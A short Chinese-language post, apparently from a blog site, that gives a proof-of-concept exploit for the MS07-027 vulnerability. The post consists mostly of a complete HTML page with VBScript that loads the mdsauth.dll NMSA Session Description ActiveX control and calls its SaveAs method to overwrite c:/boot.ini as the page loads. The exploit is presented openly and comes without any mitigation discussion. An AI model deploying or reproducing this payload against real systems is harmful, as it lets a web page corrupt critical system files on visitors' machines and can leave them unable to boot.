本文提供了一个针对MS07-027漏洞的Proof of Concept (PoC) 实例,展示了如何利用该漏洞进行任意文件修改。通过一段具体的HTML和VBScript代码,演示了攻击者如何利用mdsauth.dll组件中的NMSASessionDescriptionObject SaveAs方法来篡改系统关键文件,例如boot.ini。
CODE:
<html>
<title> MS07-027 mdsauth.dll NMSA Session Description Object SaveAs control, arbitrary file modification </title>
<body>
<OBJECT id="target" classid="clsid:d4fe6227-1288-11d0-9097-00aa004254a0">
</OBJECT>
<script language="vbscript">
//next script is converted to UTF16
target.SessionDescription="MS07-027 mdsauth.dll Proof of Concept exploit"
target.SessionAuthor="Andres Tarasco Acuna"
target.SessionEmailContact="atarasco_at_gmail.com"
target.SessionURL="http://www.514.es"
target.SaveAs "c:/boot.ini"
</script>
</body>
</html>
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
